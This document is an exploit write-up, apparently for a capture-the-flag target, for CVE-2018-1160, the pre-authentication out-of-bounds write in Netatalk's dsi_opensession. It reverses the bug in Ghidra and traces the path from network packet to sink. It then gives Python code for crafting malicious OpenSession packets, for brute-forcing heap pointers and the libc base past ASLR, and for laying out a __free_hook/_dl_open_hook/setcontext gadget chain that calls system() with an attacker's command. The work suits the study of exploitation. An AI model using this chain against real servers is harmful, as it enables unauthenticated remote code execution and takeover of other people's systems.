CVE-2018-1160 POC
Netatalk before 3.1.12 is vulnerable to an out of bounds write in dsi_opensess.c. This is due to lack of bounds checking on attacker controlled data. A remote unauthenticated attacker can leverage this vulnerability to achieve arbitrary code execution.
Finding the sink and the source
I decided to start inspecting the pure binaries, to also work on my reversing skills.
Library
We create a new Ghidra project and first inspect afpd. We see that a lot of dsi_* functions are imported. This is important, as the CVE advisory mentions that the vulnerability is in dsi_opensess.c.
We have only two binaries, afpd and libatalk. Let’s add the library to the project and inspect it.
We immediately find the dsi_opensession function.
While analysing the code, we rename variables and add comments to make it easier to follow.
void dsi_opensession(long acid)
{
int iVar1;
uint acid_length;
uint uVar2;
int *piVar3;
char *pcVar4;
undefined1 *acid_6e8;
long lVar5;
ulong uVar6;
undefined8 *puVar7;
ulong uVar8;
byte bVar9;
undefined8 *acid_6d8;
byte acid_element;
undefined8 *value;
bVar9 = 0;
iVar1 = setnonblock(*(undefined4 *)(acid + 0x10714));
if (iVar1 < 0) {
if (1 < DAT_0037fa48) {
piVar3 = __errno_location();
pcVar4 = strerror(*piVar3);
make_log_entry(2,4,"dsi_opensess.c",0x1a,"dsi_opensession: setnonblock: %s",pcVar4);
}
netatalk_panic("setnonblock error");
/* WARNING: Subroutine does not return */
abort();
}
uVar6 = 0;
acid_6e8 = *(undefined1 **)(acid + 0x6e8);
acid_6d8 = (undefined8 *)(acid + 0x6d8);
if (*(long *)(acid + 0x106f8) != 0) {
do {
while( true ) {
/* acid_6e8[uvar6] == type */
iVar1 = (int)uVar6;
uVar8 = (ulong)(iVar1 + 1);
/* acid_6e8[uvar8] == length */
acid_element = acid_6e8[uVar8]; // [1] -> we control the length
acid_length = (uint)acid_element;
if (acid_6e8[uVar6] != '\x01') break;
value = (undefined8 *)(acid_6e8 + uVar8 + 1);
if (acid_length < 8) {
//[snip] - we don't care about lower lengths
}
else {
*acid_6d8 = *value;
*(undefined8 *)(acid + 0x6d0 + (ulong)acid_length) =
*(undefined8 *)((long)value + ((ulong)acid_length - 8)); // [2] - write at attacker controlled offset
puVar7 = (undefined8 *)(acid + 0x6e0U & 0xfffffffffffffff8);
lVar5 = (long)acid_6d8 - (long)puVar7;
value = (undefined8 *)((long)value - lVar5);
for (uVar6 = (ulong)(acid_length + (int)lVar5 >> 3); uVar6 != 0; uVar6 = uVar6 - 1) {
*puVar7 = *value;
value = value + (ulong)bVar9 * -2 + 1;
puVar7 = puVar7 + (ulong)bVar9 * -2 + 1;
}
LAB_00126098:
acid_6e8 = *(undefined1 **)(acid + 0x6e8);
}
acid_length = *(uint *)(acid + 0x6d8);
/* ntoh transformation */
*(uint *)(acid + 0x6d8) =
acid_length >> 0x18 | (acid_length & 0xff0000) >> 8 | (acid_length & 0xff00) << 8 |
acid_length << 0x18;
uVar6 = (ulong)(iVar1 + 2 + (uint)(byte)acid_6e8[uVar8]);
if (*(ulong *)(acid + 0x106f8) <= uVar6) goto LAB_00125fd0;
}
uVar6 = (ulong)(iVar1 + 2 + acid_length);
} while (uVar6 < *(ulong *)(acid + 0x106f8));
}
LAB_00125fd0:
*(undefined8 *)(acid + 0x106f8) = 0xc;
*(undefined1 *)(acid + 0x598) = 1;
*(undefined4 *)(acid + 0x59c) = 0;
*acid_6e8 = 0;
*(undefined1 *)(*(long *)(acid + 0x6e8) + 1) = 4;
acid_length = *(uint *)(acid + 0x6e0);
/* ntoh transformation */
uVar2 = acid_length >> 0x18 | (acid_length & 0xff0000) >> 8 | (acid_length & 0xff00) << 8 |
acid_length << 0x18;
if (acid_length < 32000) {
uVar2 = 0x1000;
}
*(uint *)(*(long *)(acid + 0x6e8) + 2) = uVar2;
*(undefined1 *)(*(long *)(acid + 0x6e8) + 6) = 2;
*(undefined1 *)(*(long *)(acid + 0x6e8) + 7) = 4;
*(undefined4 *)(*(long *)(acid + 0x6e8) + 8) = 0x80000000;
acid_length = (uint)*(undefined8 *)(acid + 0x106f8);
/* ntoh transformation */
*(uint *)(acid + 0x5a0) =
acid_length >> 0x18 | (acid_length & 0xff0000) >> 8 | (acid_length & 0xff00) << 8 |
acid_length << 0x18;
dsi_stream_send(acid,*(undefined8 *)(acid + 0x6e8));
return;
}
The first important part of the code is at [1]. Here we have a TLV (type-length-value) structure, and all of its fields are attacker controlled. We want to focus especially on the length.
At [2], the length is used to copy the value into the structure without any bounds check. The destination is a 4-byte field at acid + 0x6d8, but the length is a single attacker-controlled byte, so up to 255 bytes can be written starting at that field.
This is a classic out-of-bounds write.
The line *(undefined8 *)(acid + 0x6d0 + (ulong)acid_length) = *(undefined8 *)((long)value + ((ulong)acid_length - 8)); copies the last 8 bytes of the value, from value + (acid_length - 8) to the destination at acid + 0x6d0 + acid_length, which is the same as acid + 0x6d8 + (acid_length - 8). Together with the loop that follows, it looks like the compiler’s inlined copy of acid_length bytes.
So, we can write arbitrary values over whatever sits within 255 bytes of acid + 0x6d8. Also, lucky for us, those values are not overwritten further in the code (apart from the first four bytes, which are byte-swapped), so once we write our bytes at the desired offset, we are done with them.
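The unchecked copy can be modelled in a few lines of Python. This is only a toy model under stated assumptions: the structure is a flat bytearray, the offsets 0x6d8 and 0x6e8 are taken from the decompilation above, and the function and variable names are made up for illustration. It is not the library's code.

```python
import struct

ATTN_QUANTUM_OFF = 0x6D8   # destination of the copy, from the decompilation
COMMANDS_PTR_OFF = 0x6E8   # pointer that the decompiled loop reloads as acid_6e8


def parse_options(dsi: bytearray, commands: bytes) -> None:
    """Toy model of the option loop: copies `length` bytes with no bounds check."""
    i = 0
    while i + 1 < len(commands):
        opt_type = commands[i]
        length = commands[i + 1]
        # Pad so that the toy copy always moves exactly `length` bytes.
        value = commands[i + 2 : i + 2 + length].ljust(length, b"\x00")
        if opt_type == 0x01:
            # The field is 4 bytes wide, but nothing enforces that here.
            dsi[ATTN_QUANTUM_OFF : ATTN_QUANTUM_OFF + length] = value
        i += 2 + length


dsi = bytearray(0x800)
struct.pack_into("<Q", dsi, COMMANDS_PTR_OFF, 0x555500001000)  # made-up original pointer

# 16 filler bytes reach offset 0x6e8, the next 8 bytes replace the pointer.
option = bytes([0x01, 0x18]) + b"A" * 16 + struct.pack("<Q", 0x414141414141)
parse_options(dsi, option)

new_ptr = struct.unpack_from("<Q", dsi, COMMANDS_PTR_OFF)[0]
print(hex(new_ptr))
```

A length of 4 would stay inside the field. Any larger length spills into the neighbouring bytes.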
Now that we have discovered the sink, we must discover the source: how an unauthenticated remote attacker can reach this code, and how the bug can be exploited.
The dsi_opensession function is called only by dsi_getsession.
dsi_getsession is not called by any other function inside the library, but it is exported to the main binary, so we will probably want to look there to find the actual source.
However, we must also understand what happens at this level.
A socket is created and set to non-blocking.
Then, fork is used to create a child process. This is important to us, because dsi_opensession is only called in the child, that is, only if the fork call succeeds.
In the child (fork returned 0), here is the code that interests us:
if (__pid == 0) {
/* block 1 */
lVar7 = *(long *)((long)param_1 + 8);
*(undefined4 *)(lVar7 + 0x2370) = *(undefined4 *)(param_2 + 0x28);
*(undefined4 *)(lVar7 + 0x2374) = *(undefined4 *)(param_2 + 0x2c);
*(int *)(lVar7 + 0x2358) = local_cc;
close(sock);
close(*(int *)((long)param_1 + 0x10718));
*(undefined4 *)((long)param_1 + 0x10718) = 0xffffffff;
server_child_free(param_2);
/* block 2 */
if (*(char *)((long)param_1 + 0x599) == '\x03') {
dsi_getstatus(param_1);
p_Var9 = (__fd_mask *)local_c8;
for (lVar7 = 0x10; lVar7 != 0; lVar7 = lVar7 + -1) {
*p_Var9 = uVar8;
p_Var9 = p_Var9 + 1;
}
lVar7 = __fdelt_chk((long)*(int *)((long)param_1 + 0x10714));
local_c8[lVar7] =
local_c8[lVar7] | 1L << ((byte)(*(int *)((long)param_1 + 0x10714) % 0x40) & 0x3f);
free(param_1);
select(0x400,(fd_set *)local_c8,(fd_set *)0x0,(fd_set *)0x0,(timeval *)&DAT_0037f5d0);
/* WARNING: Subroutine does not return */
exit(0);
}
/* block 3 */
if (*(char *)((long)param_1 + 0x599) != '\x04') {
if (4 < debug_level) {
make_log_entry(5,4,"dsi_getsess.c",0x79,"DSIUnknown %d");
}
(**(code **)((long)param_1 + 0x10760))(param_1);
/* WARNING: Subroutine does not return */
exit(1);
}
/* block 4 */
*(long *)((long)param_1 + 0x6b8) = (long)param_3;
*(long *)((long)param_1 + 0x6a8) = (long)param_3;
*(undefined8 *)((long)param_1 + 0x6c0) = 0;
*(undefined8 *)((long)param_1 + 0x6b0) = 0;
dsi_opensession(param_1);
*param_4 = 0;
uVar8 = (ulong)uVar2;
}
Let’s split this into blocks.
lVar7 = *(long *)((long)param_1 + 8);
*(undefined4 *)(lVar7 + 0x2370) = *(undefined4 *)(param_2 + 0x28);
*(undefined4 *)(lVar7 + 0x2374) = *(undefined4 *)(param_2 + 0x2c);
*(int *)(lVar7 + 0x2358) = local_cc;
close(sock);
close(*(int *)((long)param_1 + 0x10718));
*(undefined4 *)((long)param_1 + 0x10718) = 0xffffffff;
server_child_free(param_2);
Update Session Structure:
- lVar7 = *(long *)((long)param_1 + 8) gets a pointer from param_1 + 8 (likely a session or server structure).
- Copies fields from param_2 + 0x28 and param_2 + 0x2c (likely server configuration, e.g., port or address) to lVar7 + 0x2370 and lVar7 + 0x2374.
- Sets lVar7 + 0x2358 to local_cc (the child’s socket for communication).
Close Unused Sockets:
- Closes sock (the parent’s socket, not needed in the child).
- Closes the socket at param_1 + 0x10718 (likely the original client socket) and sets it to -1.
Impact on dsi_opensession:
- Sets up the session structure (param_1) with the child’s socket (local_cc), which dsi_opensession uses (at acid + 0x10714) for non-blocking I/O.
- Ensures param_1 is ready for session processing.
if (*(char *)((long)param_1 + 0x599) == '\x03') {
dsi_getstatus(param_1);
p_Var9 = (__fd_mask *)local_c8;
for (lVar7 = 0x10; lVar7 != 0; lVar7 = lVar7 + -1) {
*p_Var9 = uVar8;
p_Var9 = p_Var9 + 1;
}
lVar7 = __fdelt_chk((long)*(int *)((long)param_1 + 0x10714));
local_c8[lVar7] =
local_c8[lVar7] | 1L << ((byte)(*(int *)((long)param_1 + 0x10714) % 0x40) & 0x3f);
free(param_1);
select(0x400,(fd_set *)local_c8,(fd_set *)0x0,(fd_set *)0x0,(timeval *)&DAT_0037f5d0);
/* WARNING: Subroutine does not return */
exit(0);
}
param_1 + 0x599 represents the command received. If the command is \x03, dsi_getstatus is called and the child process exits. We want to avoid falling into this branch.
if (*(char *)((long)param_1 + 0x599) != '\x04') {
if (4 < debug_level) {
make_log_entry(5,4,"dsi_getsess.c",0x79,"DSIUnknown %d");
}
(**(code **)((long)param_1 + 0x10760))(param_1);
/* WARNING: Subroutine does not return */
exit(1);
}
If the command is anything other than \x03 or \x04, it is invalid, so the child process exits with an error. This means that to reach the next block (our golden block, as it calls dsi_opensession) we must set this byte to \x04.
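The three branches can be summarised as a small dispatch function. This is a sketch of the control flow read from the decompilation. The constant names and the returned strings are illustrative and are not taken from the binary.

```python
GETSTATUS = 0x03      # command byte that leads to dsi_getstatus
OPENSESSION = 0x04    # command byte that leads to dsi_opensession


def child_action(command: int) -> str:
    """Describe what the forked child does for a given command byte."""
    if command == GETSTATUS:
        return "dsi_getstatus, then exit(0)"
    if command != OPENSESSION:
        return "log DSIUnknown, then exit(1)"
    return "dsi_opensession"


for cmd in (0x02, 0x03, 0x04):
    print(hex(cmd), "->", child_action(cmd))
```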
*(long *)((long)param_1 + 0x6b8) = (long)param_3;
*(long *)((long)param_1 + 0x6a8) = (long)param_3;
*(undefined8 *)((long)param_1 + 0x6c0) = 0;
*(undefined8 *)((long)param_1 + 0x6b0) = 0;
dsi_opensession(param_1);
*param_4 = 0;
uVar8 = (ulong)uVar2;
Finally, we get to the block that calls dsi_opensession.
This sets two values in the param_1 structure to param_3 (likely some sort of timeout) and another two values to 0.
Then, we finally call our sink function.
Now it is time to move to the main binary and check the calls made to dsi_getsession.
Main Binary
As previously mentioned, the main binary only imports dsi_getsession. This function is called only once, in the main function.
main is a bit too big to go into in full detail here. This is a high-level summary of the code.
The main function initializes the Netatalk server by:
- Parsing command-line and configuration files.
- Setting up signal handlers and file descriptor limits.
- Initializing the socket handler and CNID database.
- Entering a poll loop to handle incoming connections and child process events.
- Calling dsi_getsession for new connections, which forks a child process and calls dsi_opensession for DSI_OPENSESSION commands.
- Managing configuration reloads and child process cleanup.
This is the outline of main_poll_loop, which waits for events on file descriptors. When the poll loop detects an incoming connection, a session is created through a call to dsi_getsession.
main_poll_loop:
do {
while( true ) {
pthread_sigmask(1,&local_158,(__sigset_t *)0x0);
iVar5 = poll((pollfd *)*plVar14,(long)*(int *)((long)plVar14 + 0x14),-1);
pthread_sigmask(0,&local_158,(__sigset_t *)0x0);
if (DAT_0035c5b0 == 0) break;
...
}
...
} while( true );
This is the code responsible for handling events.
if (iVar5 != 0) {
if (iVar5 < 0) {
if (__errnum != 4) {
if (1 < (uint)type_configs._56_4_) {
pcVar9 = strerror(__errnum);
make_log_entry(2,3,"main.c",0x198,"main: can\'t wait for input: %s",pcVar9);
}
return 0;
}
}
else {
lVar11 = 0;
if (0 < *(int *)((long)DAT_0035c5a8 + 0x14)) {
do {
if ((*(byte *)(*plVar14 + 6 + lVar11 * 8) & 0x39) != 0) {
piVar8 = (int *)(lVar11 * 0x10 + plVar14[1]);
if (*piVar8 == 0) {
...
}
else if (*piVar8 == 1) {
uVar12 = *(undefined8 *)(piVar8 + 2);
local_168.rlim_cur = 0;
iVar5 = dsi_getsession(uVar12,DAT_0035c5b8,DAT_0035c5e4,&local_168);
...
}
}
lVar11 = lVar11 + 1;
} while (iVar5 + 1 < *(int *)((long)plVar14 + 0x14));
}
}
}
If poll returns events (iVar5 > 0), the loop:
- Iterates over the file descriptors in DAT_0035c5a8.
- For each event, checks the type at piVar8:
  - If 0, handles IPC requests from children (ipc_server_read).
  - If 1, calls dsi_getsession(uVar12, DAT_0035c5b8, DAT_0035c5e4, &local_168) to start a new session.
uVar12 becomes param_1 in dsi_getsession and is then passed as acid to dsi_opensession. The structure it points to also holds the pointer to the client’s network packet, acid_6e8.
Before being passed as an argument, uVar12 is assigned a pointer read from piVar8.
uVar12 = *(undefined8 *)(piVar8 + 2);
Now, we know the complete flow of how a data packet gets from an attacker to the sink.
We can also confirm our analysis looking at the packet layout as per the specifications: https://en.wikipedia.org/wiki/Data_Stream_Interface.
import struct

dsi_hdr = struct.pack(">BBHLLL",
0x00, # Flags (request)
0x04, # Command (OpenSession)
0x0001, # Req-ID
0x00000000, # Error / Offset
0x00000006, # Data-len
0x00000000) # Reserved
option = struct.pack(">BBL",
0x00, # DSIOPT_SERVQUANT
0x04, # length
0x00004000) # 16 KB
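Building on that layout, a request that reaches the vulnerable branch only needs option type 0x01 and a length larger than 4. The helper below is a sketch. The function name and the example payload are illustrative. The header fields mirror the layout shown above.

```python
import struct

DSI_OPENSESSION = 0x04
OPT_ATTNQUANT = 0x01   # option type compared against '\x01' in the decompilation


def build_open_session(value: bytes, req_id: int = 1) -> bytes:
    """Build an OpenSession request carrying one option with an arbitrary value."""
    if len(value) > 0xFF:
        raise ValueError("the option length is a single byte")
    option = struct.pack(">BB", OPT_ATTNQUANT, len(value)) + value
    header = struct.pack(">BBHLLL",
                         0x00,             # Flags (request)
                         DSI_OPENSESSION,  # Command
                         req_id,           # Req-ID
                         0,                # Error / Offset
                         len(option),      # Data-len
                         0)                # Reserved
    return header + option


# 16 filler bytes cover the fields before the commands pointer,
# and one extra byte replaces the pointer's least significant byte.
packet = build_open_session(b"A" * 16 + b"\x00")
print(packet.hex())
```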
Exploiting
While we found our sink using nothing but the provided binaries, we would like to use the source code as well, since Netatalk is open source. The code uses custom data structures that are hard to follow in the decompiler, so it is hard to pinpoint exactly what we are overwriting. The only way to continue the analysis properly with the binary alone would be to create a custom data type in Ghidra, but that seems like overkill.
The out-of-bounds write looks like this in the source code:
case DSIOPT_ATTNQUANT:
memcpy(&dsi->attn_quantum, dsi->commands + i + 1,
dsi->commands[i]);
dsi->commands + i + 1 is the value, dsi->commands[i] is the length, and dsi->attn_quantum is the field we overflow.
Also, note that the length dsi->commands[i] is a single byte, so one option can copy at most 255 bytes.
typedef struct DSI {
struct DSI *next; /* multiple listening addresses */
AFPObj *AFPobj;
int statuslen;
char status[1400];
char *signature;
struct dsi_block header;
struct sockaddr_storage server, client;
struct itimerval timer;
int tickle; /* tickle count */
int in_write;
int msg_request; /* pending message to the client */
int down_request; /* pending SIGUSR1 down in 5 mn */
uint32_t attn_quantum, datasize, server_quantum;
uint16_t serverID, clientID;
uint8_t *commands; /* DSI receive buffer */
uint8_t data[DSI_DATASIZ]; /* DSI reply buffer */
size_t datalen, cmdlen;
This is what the DSI struct looks like. We can overwrite attn_quantum, datasize, server_quantum, serverID, clientID, commands and part of data.
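To see which fields a given option length reaches, the offsets relative to attn_quantum can be tabulated. This sketch assumes the x86-64 layout implied by the decompilation (attn_quantum at 0x6d8, commands at 0x6e8, no padding in between). The helper name is made up.

```python
from typing import List

# (field name, offset from attn_quantum) following the struct definition above
FIELDS = [
    ("attn_quantum", 0),
    ("datasize", 4),
    ("server_quantum", 8),
    ("serverID", 12),
    ("clientID", 14),
    ("commands", 16),
    ("data", 24),
]


def fields_touched(length: int) -> List[str]:
    """Return the fields that a copy of `length` bytes at attn_quantum reaches."""
    return [name for name, start in FIELDS if length > start]


print(fields_touched(4))
print(fields_touched(24))
print(fields_touched(255))
```

A length of 24 is the smallest one that fully replaces the 8-byte commands pointer. Lengths from 17 to 23 overwrite it only partially.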
What is dsi->commands used for? The comment says it is the DSI receive buffer, which suggests that it points to a buffer an attacker can also write to.
After the dsi_getsession call returns, a call to afp_over_dsi is made. This function has a main loop where it calls dsi_stream_receive().
There, the following call is made: dsi_stream_read(dsi, dsi->commands, dsi->cmdlen). This function reads data into dsi->commands, so once the pointer is overwritten, the next request we send is written wherever it points.
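The resulting primitive can be pictured with a toy model: whatever the session receives next lands at the address held in the commands pointer. The class below is purely illustrative. Memory is a dictionary and the addresses are made up.

```python
from typing import Dict


class ToySession:
    """Toy stand-in for the DSI session: one pointer and a sparse memory map."""

    def __init__(self, commands_ptr: int) -> None:
        self.commands_ptr = commands_ptr
        self.memory: Dict[int, int] = {}   # address -> byte value

    def receive(self, payload: bytes) -> None:
        # Models dsi_stream_read(dsi, dsi->commands, dsi->cmdlen):
        # incoming bytes are stored at the address in commands_ptr.
        for offset, byte in enumerate(payload):
            self.memory[self.commands_ptr + offset] = byte


session = ToySession(commands_ptr=0x1000)
session.commands_ptr = 0x7000          # effect of the overflow in OpenSession
session.receive(b"\xde\xad\xbe\xef")   # the next request lands at 0x7000
print({hex(addr): hex(val) for addr, val in session.memory.items()})
```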
Defeating ASLR
While the original exploit focused on an environment where this binary was not protected by ASLR, we must exploit it in a more hardened environment. We don’t know of any address leak vulnerability that could help us defeat ASLR.
However, remember that our code is running inside a forked child. This is important for us for 2 reasons:
- We can crash the child as many times as we want. If the code ran in the main process instead, a crash would take down the target.
- Each forked child starts as a copy of the parent’s address space, so the memory layout is the same in every child. This means that if we find a valid address for one child, we find a valid address for any child.
These two conditions work in our favour, as they mean we can try to guess a valid address and get an idea of the address space at runtime.
We know that we can overwrite the commands pointer. The neat part is that if the address is invalid (an address that’s not part of the heap), the child crashes and we get no response from the server. If we manage to guess a correct address (wherever it may point on the heap), we get a garbage response. So, we can keep guessing addresses until we get a response, which means we don’t need an address leak. Also, keep in mind that we want to find a valid heap page, not necessarily an exact address.
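The guessing loop can be sketched as follows. It rests on several assumptions that are not spelled out in the text: the pointer is overwritten partially, least significant byte first, so the untouched upper bytes keep their original value. Six bytes are enough for a user-space address. probe is a hypothetical callback that sends one request and reports whether the server answered. Here it is replaced by a fake oracle so that the logic can be run offline.

```python
from typing import Callable


def brute_force_pointer(probe: Callable[[bytes], bool], width: int = 6) -> int:
    """Recover a mapped address one byte at a time, trying 0xFF first."""
    known = b""
    for _ in range(width):
        for guess in range(0xFF, -1, -1):
            if probe(known + bytes([guess])):
                known += bytes([guess])
                break
        else:
            raise RuntimeError("no byte value produced a response")
    return int.from_bytes(known, "little")


def make_fake_probe(original: int, mapped: range) -> Callable[[bytes], bool]:
    """Offline stand-in for the server: answers only if the pointer is mapped."""
    orig = original.to_bytes(8, "little")

    def probe(prefix: bytes) -> bool:
        # The overwritten low bytes are combined with the original high bytes.
        addr = int.from_bytes(prefix + orig[len(prefix):], "little")
        return addr in mapped

    return probe


# Made-up values: one mapped region and the pointer's original value.
mapped_region = range(0x7F1234000000, 0x7F1234800000)
fake_probe = make_fake_probe(0x7F1234567010, mapped_region)
leaked_addr = brute_force_pointer(fake_probe)
print(hex(leaked_addr))
```

Because every byte is tried from 0xFF downwards, the search settles on the highest address in the region that still answers.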
Finding libc base
However, a working exploit needs more than just a random heap address. Ideally, we want to find the base address of libc.
Let’s call the address we leaked at the previous step leaked_addr. Because we started from 0xFF and went down when brute-forcing each byte, we will find a rather high heap address, so libc_base = leaked_addr - offset.
However, how can we know the offset? Well, we are going to guess it as well. The offset should be anywhere between 0 and 0xffff000. We are only going to try page-aligned 0xXXXX000 values, which is at most 0x10000 candidates, so this shouldn’t take long.
If we guessed the offset correctly, our exploit will work; otherwise it will fail.
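The candidate list is easy to enumerate. In this sketch the leaked address is first rounded down to a page boundary. That rounding is an assumption made here so that every candidate base is page-aligned. The function name is illustrative.

```python
from typing import Iterator

PAGE = 0x1000
MAX_OFFSET = 0xFFFF000


def candidate_libc_bases(leaked_addr: int) -> Iterator[int]:
    """Yield page-aligned candidates for libc_base = leaked_addr - offset."""
    page = leaked_addr & ~(PAGE - 1)
    for offset in range(0, MAX_OFFSET + PAGE, PAGE):
        base = page - offset
        if base >= 0:
            yield base


candidates = list(candidate_libc_bases(0x7F12347FFFFF))  # made-up leaked address
print(len(candidates), hex(candidates[0]), hex(candidates[-1]))
```

Each candidate costs one full exploit attempt, so the search is bounded by the size of this list.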
Building a ROP chain
Now, armed with libc’s base address, it is time to build a ROP chain that we can use to get a shell.
Taking control
The first question here is how we can hijack the program’s execution flow. We have no way of overwriting the stack, so how can we still do this? The answer is: hooks.
Hooks are special variables (function pointers) within the libc library. Their purpose is debugging memory allocation. By default, each hook is NULL. However, if it’s set to the address of a function, then every time the hooked function is called anywhere in the program, the program will instead call the function pointed to by the hook.
We can overwrite any of the hooks and make them point wherever* we want. Then, any time the function we hooked is called, our code is executed instead. Considering the flow of our exploit, free is the most logical target, as it gets called once we close the socket, to free the memory used for the new connection.
* - of course, it needs to be valid executable code; NX is a thing, it’s not the 90s anymore
Our goal is to somehow call system. However, we have a problem. When free() gets called, it receives as an argument a pointer to whatever memory the program tries to free. If we overwrite __free_hook with the address of system, system will get that pointer as its argument. Instead, we must pass a valid command as the argument.
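The problem is easier to see in a toy model of a hooked free. Nothing here is glibc code. The functions only record what would be called, and all names are made up.

```python
from typing import Callable, List, Optional

free_hook: Optional[Callable[[int], None]] = None   # stands in for __free_hook
calls: List[str] = []


def real_free(ptr: int) -> None:
    calls.append(f"real_free({ptr:#x})")


def free(ptr: int) -> None:
    """If the hook is set, it is called instead, with the same argument."""
    if free_hook is not None:
        free_hook(ptr)
        return
    real_free(ptr)


def fake_system(arg: int) -> None:
    calls.append(f"system({arg:#x})")


free(0x1000)              # hook is empty, normal path
free_hook = fake_system   # effect of overwriting the hook
free(0x2000)              # system receives the chunk pointer, not a command
print(calls)
```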
Full takeover
A very useful gadget for such exploits is setcontext. setcontext is a legitimate libc function that restores a full CPU context (all registers, instruction pointer, stack pointer) from a special structure in memory.
; setcontext + 53
mov rsp, [rdi+0a0h]
mov rbx, [rdi+80h]
mov rbp, [rdi+78h]
mov r12, [rdi+48h]
mov r13, [rdi+50h]
mov r14, [rdi+58h]
mov r15, [rdi+60h]
mov rcx, [rdi+0a8h]
push rcx
mov rsi, [rdi+70h]
mov rdx, [rdi+88h]
mov rcx, [rdi+98h]
mov r8, [rdi+28h]
mov r9, [rdi+30h]
mov rdi, [rdi+68h]
xor eax, eax
retn
Using setcontext we can place arbitrary values in both rdi and rip. If we set rip to the address of system and rdi to a pointer to a valid command, then we get command execution.
However, we still have a problem: setcontext reads every value it restores from the memory that rdi points to. So, before calling this function, we must make rdi point to a memory address where we have stored just the right values.
Preparing for T-0 seconds
So, we must find a way to make rdi point to a controllable memory region. Let’s call it mem.
_dl_open_hook is stored at an offset of +0x2BC0 from __free_hook. This means we can overwrite this address as well. This leads us to the libc_dlopen_mode + 56 gadget. This gadget first loads the value stored in _dl_open_hook into the rax register. Then it calls the function pointer stored at the address now in rax.
mov rax, qword ptr [rip + <offset_to__dl_open_hook>] ; essentially mov rax, cs:_dl_open_hook
call qword ptr [rax]
The value loaded into rax is our mem pointer.
When libc_dlopen_mode + 56 executes call [rax], it calls the pointer stored at mem. We control this memory, and we want it to hold the address of fgetpos64 + 207.
mov rdi, rax
call qword ptr [rax + 0x20]
This gadget simply copies rax to rdi, then calls the function pointer stored at mem+0x20. This means that rdi finally points to mem and we are ready to call setcontext. Of course, we now want to store the address of setcontext+53 at mem+0x20 so that it gets called through this pointer.
Putting it all together
So, to recap, we have the following ROP chain:
We want to overwrite __free_hook and _dl_open_hook. __free_hook will point to our first gadget and _dl_open_hook to memory we control.
Now, when free() gets called, the following chain of events happens:
- libc sees that __free_hook != NULL, so it calls the address stored there, which is libc_dlopen_mode + 56.
- libc_dlopen_mode + 56 loads the pointer stored in _dl_open_hook, which is a pointer to mem, into the rax register. Then it calls the function pointer stored at mem. This pointer must point to fgetpos64 + 207.
- fgetpos64 + 207 copies rax to rdi, so now rdi points to mem. Finally, the pointer stored at rax+0x20 (which is mem+0x20) is called. This should point to setcontext + 53.
- setcontext + 53 uses mem to set the execution context: rdi will point to our command string and rip to system. We can use SigreturnFrame() to easily prepare mem for this operation. Once the registers are loaded, the final ret in setcontext jumps to the address we supplied for rip, which amounts to calling system("cmd").
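The contents of mem implied by the chain above can be laid out by hand with struct instead of SigreturnFrame(). This is a sketch under stated assumptions: the offsets 0x68 (rdi), 0xa0 (rsp) and 0xa8 (the value pushed and returned to) come from the setcontext + 53 listing. Placing the command string right after the frame at 0xb0 is a choice made here. stack_addr is assumed to be some writable address with free space below it. Every address in the example is a made-up placeholder.

```python
import struct

CMD_OFF = 0xB0  # first free byte after the slot at 0xa8


def build_mem(mem_addr: int, fgetpos_gadget: int, setcontext_gadget: int,
              system_addr: int, stack_addr: int, cmd: bytes) -> bytes:
    """Lay out the fake structure that the three gadgets read from."""
    buf = bytearray(CMD_OFF) + cmd + b"\x00"
    struct.pack_into("<Q", buf, 0x00, fgetpos_gadget)      # called through [rax]
    struct.pack_into("<Q", buf, 0x20, setcontext_gadget)   # called through [rax+0x20]
    struct.pack_into("<Q", buf, 0x68, mem_addr + CMD_OFF)  # rdi -> command string
    struct.pack_into("<Q", buf, 0xA0, stack_addr)          # rsp
    struct.pack_into("<Q", buf, 0xA8, system_addr)         # pushed, then reached by ret
    return bytes(buf)


# Placeholder addresses, for illustration only.
mem = build_mem(mem_addr=0x7F0000100000,
                fgetpos_gadget=0x7F0000001111,
                setcontext_gadget=0x7F0000002222,
                system_addr=0x7F0000003333,
                stack_addr=0x7F0000108000,
                cmd=b"id")
print(len(mem), mem[CMD_OFF:])
```

All other register slots are left at zero, which is enough for this chain because only rdi, rsp and the return target matter.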
After putting everything together and writing an exploit, I got hit by a harsh reality: it takes time to brute-force things. It also didn’t help that my connection to the server was weak.
After some digging I found out that the server is hosted in Japan. I deployed a small VPS machine in Japan, and ran the exploit from that machine. The ping time was ~600 times faster, and so was the exploit time.